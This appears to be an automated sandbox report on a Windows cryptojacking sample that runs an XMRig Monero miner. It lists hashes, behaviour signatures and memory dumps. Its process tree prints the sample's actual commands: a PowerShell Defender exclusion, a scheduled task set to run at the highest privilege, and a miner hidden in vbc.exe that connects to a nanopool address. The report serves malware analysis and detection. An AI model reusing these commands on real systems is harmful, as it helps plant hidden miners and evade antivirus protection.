Analysis

  • max time kernel
    132s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-01-2023 23:28

General

  • Target

    file.exe

  • Size

    882KB

  • MD5

    1b946a8d9e0e30915f241061c5106a3f

  • SHA1

    2cf0b19ef93c46a164b0bc93cbb9f3793cb6c8cf

  • SHA256

    2371a3a7ac61d4daffa56c66420d0bc7ec99f1aa7dd4428f2be4cbb9dc25138f

  • SHA512

    b83858ee0e21c590cd932bbc92cbbf5a88d3458010535f18cfbe2343b99c396f373e788554b2638cfe0b76bca46e6b3734fe44d6b98d546b4252390a31be398f

  • SSDEEP

    24576:qe9E/+x1L3sNSaH3uhbTsjc/BIQ8iU7cG19:qD+sM4UfsXrc2

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 6 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Uses the VBS compiler for execution 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2140
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4736
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "WSEL" /tr "C:\ProgramData\7zip\WSEL.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4452
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "WSEL" /tr "C:\ProgramData\7zip\WSEL.exe"
        3⤵
        • Creates scheduled task(s)
        PID:4836
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:2272
    • C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 2140 -s 3648
      2⤵
      • Program crash
      PID:3824
  • C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -pss -s 436 -p 2140 -ip 2140
    1⤵
      PID:4088

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2140-153-0x00007FFC60ED0000-0x00007FFC61991000-memory.dmp

      Filesize

      10.8MB

    • memory/2140-139-0x0000000000480000-0x00000000005C4000-memory.dmp

      Filesize

      1.3MB

    • memory/2140-170-0x0000000000480000-0x00000000005C4000-memory.dmp

      Filesize

      1.3MB

    • memory/2140-136-0x00007FFC62AF0000-0x00007FFC62BAD000-memory.dmp

      Filesize

      756KB

    • memory/2140-135-0x00007FFC7B1F0000-0x00007FFC7B202000-memory.dmp

      Filesize

      72KB

    • memory/2140-138-0x00007FFC60ED0000-0x00007FFC61991000-memory.dmp

      Filesize

      10.8MB

    • memory/2140-140-0x00007FFC7E050000-0x00007FFC7E07B000-memory.dmp

      Filesize

      172KB

    • memory/2140-169-0x00007FFC60ED0000-0x00007FFC61991000-memory.dmp

      Filesize

      10.8MB

    • memory/2140-142-0x0000000000480000-0x00000000005C4000-memory.dmp

      Filesize

      1.3MB

    • memory/2140-143-0x0000000000480000-0x00000000005C4000-memory.dmp

      Filesize

      1.3MB

    • memory/2140-144-0x00007FFC629A0000-0x00007FFC62AEE000-memory.dmp

      Filesize

      1.3MB

    • memory/2140-141-0x0000000003210000-0x0000000003253000-memory.dmp

      Filesize

      268KB

    • memory/2140-133-0x00007FFC62BB0000-0x00007FFC62C5A000-memory.dmp

      Filesize

      680KB

    • memory/2140-146-0x00007FFC7D320000-0x00007FFC7D347000-memory.dmp

      Filesize

      156KB

    • memory/2140-168-0x00007FFC61EC0000-0x00007FFC6202A000-memory.dmp

      Filesize

      1.4MB

    • memory/2140-159-0x00007FFC7C6A0000-0x00007FFC7C6DB000-memory.dmp

      Filesize

      236KB

    • memory/2140-158-0x00007FFC7F050000-0x00007FFC7F0BB000-memory.dmp

      Filesize

      428KB

    • memory/2140-157-0x00007FFC5CD20000-0x00007FFC5CE22000-memory.dmp

      Filesize

      1.0MB

    • memory/2140-151-0x0000000000480000-0x00000000005C4000-memory.dmp

      Filesize

      1.3MB

    • memory/2140-152-0x0000000003210000-0x0000000003253000-memory.dmp

      Filesize

      268KB

    • memory/2140-145-0x00007FFC60ED0000-0x00007FFC61991000-memory.dmp

      Filesize

      10.8MB

    • memory/2140-134-0x00007FFC7EA10000-0x00007FFC7EAAE000-memory.dmp

      Filesize

      632KB

    • memory/2140-137-0x00007FFC7E110000-0x00007FFC7E2B1000-memory.dmp

      Filesize

      1.6MB

    • memory/2140-156-0x00007FFC63200000-0x00007FFC63235000-memory.dmp

      Filesize

      212KB

    • memory/2272-174-0x0000024B3C5A0000-0x0000024B3C5C0000-memory.dmp

      Filesize

      128KB

    • memory/2272-171-0x0000024B3C580000-0x0000024B3C5A0000-memory.dmp

      Filesize

      128KB

    • memory/2272-167-0x0000000140000000-0x00000001407C9000-memory.dmp

      Filesize

      7.8MB

    • memory/2272-166-0x0000024B3C540000-0x0000024B3C580000-memory.dmp

      Filesize

      256KB

    • memory/2272-161-0x0000000140343234-mapping.dmp

    • memory/2272-162-0x0000000140000000-0x00000001407C9000-memory.dmp

      Filesize

      7.8MB

    • memory/2272-163-0x0000000140000000-0x00000001407C9000-memory.dmp

      Filesize

      7.8MB

    • memory/2272-173-0x0000024B3C580000-0x0000024B3C5A0000-memory.dmp

      Filesize

      128KB

    • memory/2272-165-0x0000000140000000-0x00000001407C9000-memory.dmp

      Filesize

      7.8MB

    • memory/2272-164-0x0000024B3AB60000-0x0000024B3AB80000-memory.dmp

      Filesize

      128KB

    • memory/2272-160-0x0000000140000000-0x00000001407C9000-memory.dmp

      Filesize

      7.8MB

    • memory/2272-172-0x0000024B3C5A0000-0x0000024B3C5C0000-memory.dmp

      Filesize

      128KB

    • memory/4452-154-0x0000000000000000-mapping.dmp

    • memory/4736-148-0x000001C458750000-0x000001C458772000-memory.dmp

      Filesize

      136KB

    • memory/4736-147-0x0000000000000000-mapping.dmp

    • memory/4736-149-0x00007FFC60ED0000-0x00007FFC61991000-memory.dmp

      Filesize

      10.8MB

    • memory/4736-150-0x00007FFC60ED0000-0x00007FFC61991000-memory.dmp

      Filesize

      10.8MB

    • memory/4836-155-0x0000000000000000-mapping.dmp